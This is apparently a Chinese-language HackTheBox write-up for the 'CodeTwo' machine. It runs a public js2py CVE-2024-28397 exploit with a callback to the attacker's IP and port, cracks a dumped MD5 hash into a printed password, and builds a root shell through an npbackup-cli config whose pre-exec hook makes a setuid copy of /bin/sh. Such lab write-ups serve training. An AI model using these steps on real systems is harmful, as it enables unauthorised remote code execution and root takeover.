CodeTwo

Pasted image 20250819231009.png

1. Foothold

1.1. port scan

┌──(root㉿kali)-[~/Desktop/htb/codetwo]
└─# nmap 10.10.11.82 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 10:45 EDT
Warning: 10.10.11.82 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.82
Host is up (0.18s latency).
Not shown: 65445 closed tcp ports (reset), 88 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt

Nmap done: 1 IP address (1 host up) scanned in 38.64 seconds
                                                                                                  
┌──(root㉿kali)-[~/Desktop/htb/codetwo]
└─# nmap 10.10.11.82 -p 22,8000 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 11:13 EDT
Nmap scan report for 10.10.11.82
Host is up (0.066s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:47:b4:0c:69:67:93:3a:f9:b4:5d:b3:2f:bc:9e:23 (RSA)
|   256 7d:44:3f:f1:b1:e2:bb:3d:91:d5:da:58:0f:51:e5:ad (ECDSA)
|_  256 f1:6b:1d:36:18:06:7a:05:3f:07:57:e1:ef:86:b4:85 (ED25519)
/tcp open  http    Gunicorn 20.0.4
|_http-title: Welcome to CodeTwo
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.04 seconds

1.2. dirsearch

1.3. web

Pasted image 20250819231536.png
注册登录
Pasted image 20250819231657.png
又是和 Code 一样的套路,感觉,同样给你一个网站,同样可以编写并执行代码
试了几个常用的函数,发现都执行不了。

1.4. app code review

Pasted image 20250819231952.png
下载后是源码网站源码

Pasted image 20250819232049.png
可以发现引入了一些包,

1.5. 【js2py】CVE-2024-28397-RCE

然后可以搜到比较新的就是 js2py 这个包 有个CVE

js2py 是一个流行的 Python 包,可以在 Python 解释器中执行 JavaScript 代码。各种网络爬虫都会使用它来解析网站上的 JavaScript 代码
js2py 内部全局变量的实现存在漏洞,允许攻击者获取 js2py 环境中某个 python 对象的引用,从而逃离 JS 环境并在主机上执行任意命令
Pasted image 20250819232138.png
是一个远程代码执行

直接找Exp打
GitHub - harutomo-jp/CVE-2024-28397-RCE
正好有个一天以内的rce exp
Pasted image 20250819232640.png

太性情了兄弟,这还说啥啊,直接打

git clone https://github.com/harutomo-jp/CVE-2024-28397-RCE
python CVE-2024-28397-RCE.py 10.10.11.82 /run_code --local_ip 10.10.14.44 --local_port 4444

Pasted image 20250819232942.png

2. User

2.1. database &hash crack

┌──(root㉿kali)-[~/…/home/app/app/instance]
└─# sqlite3 users.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite#> .tables
code_snippet  user        
sqlite#> SELECT * FROM  user;
1|marco|649c9d65a206a75f5abe509fe128bce5
2|app|a97588c0e2fa3a024876339e27aeb42e
3|'|3590cb8af0bbb9e78c343b52b93773c9
sqlite> SELECT * FROM  code_snippet ;
2|4|const meet = "hello";

console.log(meet)

┌──(root㉿kali)-[~/…/home/app/app/instance]
└─# echo -n '649c9d65a206a75f5abe509fe128bce5' |wc -c
32

大概率md5
Pasted image 20250819234346.png
两个凭证

marco sweetangelbabylove
' '

Pasted image 20250819234521.png

3. root

3.1. sudo-npbackup-cli

marco@codetwo:~#$ sudo -l
Matching Defaults entries for marco on codetwo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marco may run the following commands on codetwo:
    `(ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli`

npbackup-cli 是一个基于 restic 的备份工具,支持在配置文件中定义 pre-exec 和 post-exec 钩子,这些钩子允许在备份操作前后执行外部命令。此外,它还支持 stdin_from_command 参数,用于从外部命令的输出中获取输入用于备份

先参考家目录下的配置 创建一个npbackup的配置文件 npbackup-config.yaml

conf_version: 3.0.1
repos:
  default:
    repo_uri: file:///tmp/backup-repo
    repo_group: exploit_group
    backup_opts:
      paths:
        - /tmp
      source_type: folder_list
      exclude_files_larger_than: 0.0
    repo_opts:
      repo_password: yourpassword
      retention_policy: {}
      prune_max_unused: 0
    prometheus: {}
    env: {}
    is_protected: false
groups:
  exploit_group:
    backup_opts:
      paths: []
      source_type: folder_list
      stdin_from_command: []
      stdin_filename: 
      tags: []
      compression: auto
      use_fs_snapshot: false  # 禁用以简化(无需 VSS)
      ignore_cloud_files: true
      one_file_system: false
      priority: low
      exclude_caches: true
      excludes_case_ignore: false
      exclude_files: []
      exclude_patterns: []
      exclude_files_larger_than: 0
      additional_parameters: []
      additional_backup_only_parameters: []
      minimum_backup_size_error: 10 MiB
      pre_exec_commands:
        - /bin/sh -c "cp /bin/sh /tmp/rootsh && chown root:root /tmp/rootsh && chmod 4777 /tmp/rootsh"
      pre_exec_per_command_timeout: 3600
      pre_exec_failure_is_fatal: false
      post_exec_commands: []
      post_exec_per_command_timeout: 3600
      post_exec_failure_is_fatal: false
      post_exec_execute_even_on_backup_error: true
      post_backup_housekeeping_percent_chance: 0
      post_backup_housekeeping_interval: 0
    repo_opts:
      repo_password: 
      repo_password_command: 
      minimum_backup_age: 1440
      upload_speed: 0
      download_speed: 0
      backend_connections: 0
      retention_policy: {}
      prune_max_unused: 0 B
      prune_max_repack_size: 
    prometheus:
      backup_job: exploit_job
      group: exploit_group
    env:
      env_variables: {}
      encrypted_env_variables: {}
    is_protected: false
identity:
  machine_id: exploit_id
  machine_group: 
global_prometheus:
  metrics: false
  instance: exploit_instance
  destination: 
  http_username: 
  http_password: 
  additional_labels: {}
  no_cert_verify: false
global_options:
  auto_upgrade: false
  auto_upgrade_percent_chance: 5
  auto_upgrade_interval: 15
  auto_upgrade_server_url: 
  auto_upgrade_server_username: 
  auto_upgrade_server_password: 
  auto_upgrade_host_identity: exploit_id
  auto_upgrade_group:

初始化仓库

sudo -u root /usr/local/bin/npbackup-cli --init --config /tmp/npbackup-config.yaml --repo-name default

root 运行备份操作,触发钩子

sudo -u root /usr/local/bin/npbackup-cli -b --config /tmp/npbackup-config.yaml --repo-name default

Pasted image 20250820001056.png

很easy,6+0.5的创新